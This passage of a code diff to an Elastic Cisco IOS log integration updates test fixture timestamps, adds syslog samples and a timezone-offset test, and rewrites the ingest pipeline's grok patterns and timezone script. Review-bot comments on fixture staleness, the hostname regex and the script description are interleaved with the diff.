8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1(64999) to 224.0.0.18(15448) -<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 \ No newline at end of file +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3 
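Review bot: The only change to this expected file is the year in four `@timestamp` values, 2023 to 2024, which shows the expected output depends on the date the test runs: the sample lines carry no year, so the pipeline fills in the current one and these fixtures go stale every January. The same applies to the four timestamps changed in the test-badauth expected file in the following hunks. Rather than regenerating the fixtures yearly, the pipeline test config for these logs could declare `@timestamp` as a dynamic field (elastic-package supports `dynamic_fields` patterns in the test config, if I recall correctly) so the assertion checks the format rather than the current year.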
diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json index e8b2d0e9f7f..55e8969a95b 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -62,7 +62,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -123,7 +123,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -183,7 +183,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", 
@@ -241,6 +241,127 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-12-08T20:07:53.081Z", + "cisco": { + "ios": { + "facility": "TCP", + "message_count": 9004 + } + }, + "destination": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "port": 1234 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BADAUTH", + "original": "<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234)", + "provider": "firewall", + "sequence": 9004, + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "priority": 190 + } + }, + "message": "Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234)", + "network": { + "type": "ipv4" + }, + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.0.1", + "10.0.0.2" + ] + }, + "source": { + "address": "10.0.0.1", + "ip": "10.0.0.1", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-12-08T20:07:53.081Z", + "cisco": { + "ios": { + "facility": "TCP", + "message_count": 9004, + "tableid": "3" + } + }, + "destination": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "port": 1234 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BADAUTH", + "original": "<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3", + "provider": "firewall", + "sequence": 9004, + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "priority": 190 + } + }, + "message": "Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3", + "network": { + "type": "ipv4" + }, + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.0.1", + "10.0.0.2" + ] + 
}, + "source": { + "address": "10.0.0.1", + "ip": "10.0.0.1", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 132381ab74e..d238981b688 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-02-08T04:00:47.272Z", + "@timestamp": "2024-02-08T04:00:47.272Z", "cisco": { "ios": { "access_list": "177", @@ -63,7 +63,7 @@ ] }, { - "@timestamp": "2023-02-09T04:00:47.272Z", + "@timestamp": "2024-02-09T04:00:47.272Z", "cisco": { "ios": { "access_list": "INBOUND-ON-F11", @@ -128,7 +128,7 @@ ] }, { - "@timestamp": "2023-02-10T04:00:47.272Z", + "@timestamp": "2024-02-10T04:00:47.272Z", "cisco": { "ios": { "access_list": "171", @@ -189,7 +189,7 @@ ] }, { - "@timestamp": "2023-05-03T19:11:32.619Z", + "@timestamp": "2024-05-03T19:11:32.619Z", "cisco": { "ios": { "access_list": "ACL-IPv6-E0/0-IN/10", @@ -270,7 +270,7 @@ ] }, { - "@timestamp": "2023-06-20T02:41:39.326Z", + "@timestamp": "2024-06-20T02:41:39.326Z", "cisco": { "ios": { "access_list": "177", @@ -334,7 +334,7 @@ ] }, { - "@timestamp": "2023-06-20T02:41:44.921Z", + "@timestamp": "2024-06-20T02:41:44.921Z", "cisco": { "ios": { "access_list": "151", @@ -400,7 +400,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:27.342Z", + "@timestamp": "2024-06-20T02:42:27.342Z", "cisco": { "ios": { "access_list": "177", @@ -464,7 +464,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:28.374Z", + "@timestamp": "2024-06-20T02:42:28.374Z", "cisco": { "ios": { "facility": "SEC", 
@@ -502,7 +502,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:33.340Z", + "@timestamp": "2024-06-20T02:42:33.340Z", "cisco": { "ios": { "access_list": "177", @@ -566,7 +566,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:08.454Z", + "@timestamp": "2024-06-20T02:43:08.454Z", "cisco": { "ios": { "access_list": "150", @@ -642,7 +642,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:28.403Z", + "@timestamp": "2024-06-20T02:43:28.403Z", "cisco": { "ios": { "facility": "SEC", @@ -680,7 +680,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:28.403Z", + "@timestamp": "2024-06-20T02:43:28.403Z", "cisco": { "ios": { "access_list": "150", @@ -746,7 +746,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:29.451Z", + "@timestamp": "2024-06-20T02:43:29.451Z", "cisco": { "ios": { "access_list": "150", @@ -822,7 +822,7 @@ ] }, { - "@timestamp": "2023-03-24T18:06:03.424Z", + "@timestamp": "2024-03-24T18:06:03.424Z", "cisco": { "ios": { "action": "Login", @@ -882,7 +882,7 @@ ] }, { - "@timestamp": "2023-03-24T18:06:00.364Z", + "@timestamp": "2024-03-24T18:06:00.364Z", "cisco": { "ios": { "action": "exited", @@ -943,7 +943,7 @@ ] }, { - "@timestamp": "2023-03-24T17:37:39.000Z", + "@timestamp": "2024-03-24T17:37:39.000Z", "cisco": { "ios": { "action": "Join", @@ -1008,7 +1008,7 @@ ] }, { - "@timestamp": "2023-03-24T17:37:39.000Z", + "@timestamp": "2024-03-24T17:37:39.000Z", "cisco": { "ios": { "action": "Join", @@ -1076,7 +1076,7 @@ ] }, { - "@timestamp": "2023-03-24T12:09:35.367Z", + "@timestamp": "2024-03-24T12:09:35.367Z", "cisco": { "ios": { "facility": "OSPF", @@ -1114,7 +1114,7 @@ ] }, { - "@timestamp": "2023-03-24T12:06:47.099Z", + "@timestamp": "2024-03-24T12:06:47.099Z", "cisco": { "ios": { "facility": "CCH323", @@ -1152,7 +1152,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.020Z", + "@timestamp": "2024-07-11T09:34:00.020Z", "cisco": { "ios": { "access_list": "internet_in_gig0", 
@@ -1219,7 +1219,7 @@ ] }, { - "@timestamp": "2023-07-11T09:31:03.762Z", + "@timestamp": "2024-07-11T09:31:03.762Z", "cisco": { "ios": { "access_list": "110", @@ -1286,7 +1286,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.334Z", + "@timestamp": "2024-07-11T09:34:00.334Z", "cisco": { "ios": { "access_list": "internet_in_gig0", @@ -1353,7 +1353,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.209Z", + "@timestamp": "2024-07-11T09:34:00.209Z", "cisco": { "ios": { "access_list": "internet_in_gig0", @@ -1420,7 +1420,7 @@ ] }, { - "@timestamp": "2023-06-10T23:34:58.206Z", + "@timestamp": "2024-06-10T23:34:58.206Z", "cisco": { "ios": { "access_list": "ACL", @@ -1484,7 +1484,7 @@ ] }, { - "@timestamp": "2023-06-10T23:34:58.206Z", + "@timestamp": "2024-06-10T23:34:58.206Z", "cisco": { "ios": { "access_list": "ACL_TEST", @@ -1550,7 +1550,7 @@ ] }, { - "@timestamp": "2023-06-10T23:35:28.207Z", + "@timestamp": "2024-06-10T23:35:28.207Z", "cisco": { "ios": { "access_list": "ACL_TEST", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json index 502a3ba6e68..4e3977d0207 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json @@ -379,7 +379,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.398Z", + "@timestamp": "2024-01-06T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -421,7 +421,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.398Z", + "@timestamp": "2024-01-06T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -463,7 +463,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.000Z", + "@timestamp": "2024-01-06T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", 
@@ -505,7 +505,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.000Z", + "@timestamp": "2024-01-06T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -547,7 +547,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.398Z", + "@timestamp": "2024-01-16T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -589,7 +589,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.398Z", + "@timestamp": "2024-01-16T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -631,7 +631,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -673,7 +673,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -715,7 +715,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log index b8f69dd5332..9eefa5ac318 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log 
@@ -7,3 +7,6 @@
 <191>2637087: rt401-rk30409: Aug 18 07:15:04.461 CEST: NTP Core (NOTICE): Clock is synchronized.
 <190>3352436: 3352457: Aug 12 2023 12:14:24.412 mdt: %IOSXE-6-PLATFORM: R0/0: cpp_cp: QFP:0.0 Thread:001 TS:00013807766185951588 %FW-6-SESS_AUDIT_TRAIL: (target:class) (ZP_PROCESS_TO_CORPORATE:CM_PROCESS_TO_CORPORATE):Stop dns session: initiator (10.50.14.44:33207) sent 48 bytes -- responder (10.120.42.6:53) sent 40 bytes, from GigabitEthernet10/0/2.6
 <190>3352460: 3352481: Aug 12 2023 12:15:33.963 mdt: %IOSXE-6-PLATFORM: R0/0: cpp_cp: QFP:0.0 Thread:001 TS:00013807835737559120 %FW-6-DROP_PKT: Dropping tcp pkt from GigabitEthernet1/0/2.6 10.50.14.44:53836 => 89.160.20.128:80(target:class)-(ZP_PROCESS_TO_CORPORATE:class-default) due to Policy drop:classify result with ip ident 13017 tcp flag 0x2, seq 4266642156, ack 0
+<191>: rt401-rk30409: Aug 18 07:15:04.461 CEST: last message repeated 66 times
+<189>1469087: chswitchm1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV
+<189>1469087: ch_switch_m-1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV
\ No newline at end of file
diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json
index ab72ab56076..6b2cb0278b9 100644
--- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json
+++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json
@@ -188,7 +188,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637085
@@ -226,7 +226,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637086 @@ -264,7 +264,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637087 
@@ -445,6 +445,122 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-08-18T07:15:04.461Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "original": "<191>: rt401-rk30409: Aug 18 07:15:04.461 CEST: last message repeated 66 times", + "provider": "firewall", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "syslog": { + "hostname": "rt401-rk30409", + "priority": 191 + } + }, + "message": "last message repeated 66 times", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-29T07:40:10.863Z", + "cisco": { + "ios": { + "facility": "ILPOWER", + "message_count": 1469087 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "SENSE_POWER_INVALID", + "original": "<189>1469087: chswitchm1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "provider": "firewall", + "sequence": 1469087, + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "notification", + "syslog": { + "hostname": "chswitchm1", + "priority": 189 + } + }, + "message": "Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-29T07:40:10.863Z", + "cisco": { + "ios": { + "facility": "ILPOWER", + "message_count": 1469087 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "SENSE_POWER_INVALID", + "original": "<189>1469087: ch_switch_m-1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "provider": 
"firewall", + "sequence": 1469087, + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "notification", + "syslog": { + "hostname": "ch_switch_m-1", + "priority": 189 + } + }, + "message": "Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log new file mode 100644 index 00000000000..8d98f6177dc --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log @@ -0,0 +1 @@ +<190>2361044: sw01: Jan 16 2022 22:11:43: %FOO-6-BAR: Test date format. diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml new file mode 100644 index 00000000000..ff85b2f2967 --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml @@ -0,0 +1,7 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event + _conf: + tz_offset: "-0600" diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json new file mode 100644 index 00000000000..c3da29e0772 --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json 
@@ -0,0 +1,46 @@ +{ + "expected": [ + { + "@timestamp": "2022-01-16T22:11:43.000-06:00", + "cisco": { + "ios": { + "facility": "FOO", + "message_count": 2361044 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BAR", + "original": "<190>2361044: sw01: Jan 16 2022 22:11:43: %FOO-6-BAR: Test date format.", + "provider": "firewall", + "sequence": 2361044, + "severity": 6, + "timezone": "-0600", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "hostname": "sw01", + "priority": 190 + } + }, + "message": "Test date format.", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml index 0410c743b93..a4f39e1a544 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -10,3 +10,5 @@ data_stream: tz_long: Australia/Sydney - tz_short: ACDT tz_long: Australia/Adelaide +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml index ba2e404a18c..a1a8b4bcb48 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -7,3 +7,5 @@ data_stream: syslog_port: 9514 preserve_original_event: true tz_offset: '-05:00' +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml index d7e572cbede..6ff2ddb6d8a 100644 
--- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml @@ -58,3 +58,5 @@ data_stream: X3HJFiimZVaNjXATqmC/y2A1KXvJdamPLy3mGXkW2cFLoPCdK2OZFUHqiuc1bigA qEf55SihFqErRMeURPPF -----END CERTIFICATE----- +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml index 3bb21fd9b82..0f5d449853e 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml @@ -12,3 +12,5 @@ data_stream: tz_long: Australia/Sydney - tz_short: ACDT tz_long: Australia/Adelaide +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 52c6adad86f..c1c14312834 100644 --- a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
@@ -33,36 +33,23 @@ processors: ignore_missing: true - grok: field: event.original - patterns: - - '%{DATA:_temp_.header} %%{GREEDYDATA:message}' - - '%{DATA:_temp_.header} %{NTP_MESSAGE:ntp_message}' - pattern_definitions: - NTP_MESSAGE: 'NTP %{GREEDYDATA}' - tag: dissect_header - - grok: - field: _temp_.header tag: grok_header patterns: - - '^(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}[:]? )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}: )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}: )?(%{NUMBER:cisco.ios.sequence}: )?(%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{HOSTNAME:log.syslog.hostname}: %{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{HOSTNAME:log.syslog.hostname}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? 
)?(%{HOSTNAME:log.syslog.hostname}: )?(%{NUMBER:cisco.ios.sequence}: )?(%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' + - '^%{CISCO_PRIORITY_MSGCOUNT}?%{SYSLOGTIMESTAMP} %{IP} %{CISCO_HOSTNAME:log.syslog.hostname}: (?:%{NUMBER:cisco.ios.sequence}: )?(?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' + - '^%{CISCO_PRIORITY_MSGCOUNT}?%{SYSLOGTIMESTAMP} (?:%{IP}|%{CISCO_HOSTNAME:log.syslog.hostname}) %{NUMBER:cisco.ios.sequence}: (?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' + - '^%{CISCO_PRIORITY_MSGCOUNT}?(?:(?:%{CISCO_HOSTNAME:log.syslog.hostname}|%{IP})[:]? )?(?:%{NUMBER:cisco.ios.sequence}: )?(?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' pattern_definitions: + CISCO_PRIORITY_MSGCOUNT: '<%{NONNEGINT:log.syslog.priority:long}>(?:%{NONNEGINT:cisco.ios.message_count})?(?:: )?' CISCO_TIMESTAMP: '[*]?%{CISCOTIMESTAMP:_temp_.cisco_timestamp}(?: %{CISCO_TZ:_temp_.tz})?' + CISCO_UPTIME: '[0-9a-zA-Z]+' + CISCO_HOSTNAME: '[a-zA-Z][0-9a-zA-Z_-]{0,61}[0-9a-zA-Z]?' CISCO_TZ: '[a-zA-Z]{1,4}' - on_failure: - - append: - field: error.message - value: |- - Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" - - remove: - field: _temp_.header - ignore_missing: true - tag: on_failure_remove_header - + - grok: + field: _temp_.message + tag: grok_message + patterns: + - '^%%{GREEDYDATA:message}$' + - '^%{GREEDYDATA:_temp_.generic_message}$' - set: field: event.sequence copy_from: cisco.ios.sequence 
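Review bot: The leading-letter requirement in `CISCO_HOSTNAME` is load-bearing and has no comment explaining it. In the third pattern the hostname alternative is tried before `%{NUMBER:cisco.ios.sequence}: `, so a class that admitted a leading digit would let an all-numeric field such as the `3352457:` in the test-syslog sample be captured as `log.syslog.hostname`; the same rule means digit-leading device names (valid under RFC 1123) will not match here, so add `# Must start with a letter so a bare sequence number is never taken for a hostname; digit-leading names are unsupported.` above the definition. `cisco.ios.message_count` was tightened to `NONNEGINT` but `cisco.ios.sequence` still uses `NUMBER`, which admits signed and fractional values that the `set` below this hunk copies into `event.sequence`; `%{NONNEGINT:cisco.ios.sequence}` would keep the two consistent, assuming no device emits anything else. The per-processor `on_failure` that appended a descriptive `error.message` is gone, so a header matching none of the three patterns now surfaces only through whatever pipeline-level handler exists outside this hunk, which is worth confirming since the README change in this same commit tells users that unstripped relay prefixes make ingestion fail.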
@@ -83,41 +70,30 @@ processors: ignore_missing: true pattern: ' {2,}' replacement: ' ' - # Adding support to map timezone abbreviations that is not supported by Java manually. - # If no match is found, it will default back to _conf.tz_offset as before. - # If tz_offset is not set, it will default to UTC as before. - script: lang: painless tag: script_timezone - if: ctx._temp_?.tz != null && ctx._temp_?.tz != '' - source: >- - def conf = ctx['_conf']; - if (conf == null) return; - - if (conf.tz_offset == null) { - conf.tz_offset = 'UTC'; - } - - def mappings = conf.tz_map; - if (mappings == null) { - ctx.event.timezone = conf.tz_offset; - return; - } - - def tz_log = ctx._temp_.tz; - for (def item : mappings) { - if (item.tz_short == tz_log) { - ctx.event.timezone = item.tz_long; - break; + description: >- + Add support to map timezone abbreviations that are not supported by + Java manually. If no match is found, it will default back to + _conf.tz_offset as before. If tz_offset is not set, it will default to + UTC as before. + if: + source: |- + if (ctx._temp_?.tz != null && ctx._conf?.tz_map != null) { + for (def item : ctx._conf.tz_map) { + if (item.tz_short == ctx._temp_.tz) { + ctx.event.timezone = item.tz_long; + return; + } } } - if (ctx.event.timezone == null) { - ctx.event.timezone = conf.tz_offset; + if (ctx._conf?.tz_offset != null) { + ctx.event.timezone = ctx._conf.tz_offset; + } + if (ctx.event?.timezone == null) { + ctx.event.timezone = 'UTC'; } - - set: - field: event.timezone - value: UTC - if: ctx.event?.timezone == null - date: if: ctx?._temp_.cisco_timestamp != null field: _temp_.cisco_timestamp 
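Review bot: The new description says the fallback to `_conf.tz_offset` works "as before", but the old processor only ran when `_temp_.tz` was non-empty, so a log line carrying no timezone abbreviation used to end up on `UTC` and now receives the configured offset, which is exactly what the new test-tzoffset fixture asserts with `-0600`. The description should state that change rather than claim continuity, e.g. `Timezone resolution: a tz_map match wins; otherwise the configured tz_offset applies to every event, including lines with no timezone token (previously UTC); UTC is the last resort.` The hunk also leaves a bare `if:` key with no condition, as far as the collapsed diff shows; if the file really reads that way, delete the key, since a null condition is a no-op that looks like an editing accident, and add `# Runs unconditionally: the script also supplies the UTC default that the removed set processor used to apply.` The `date` processor whose first lines close the hunk continues outside it.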
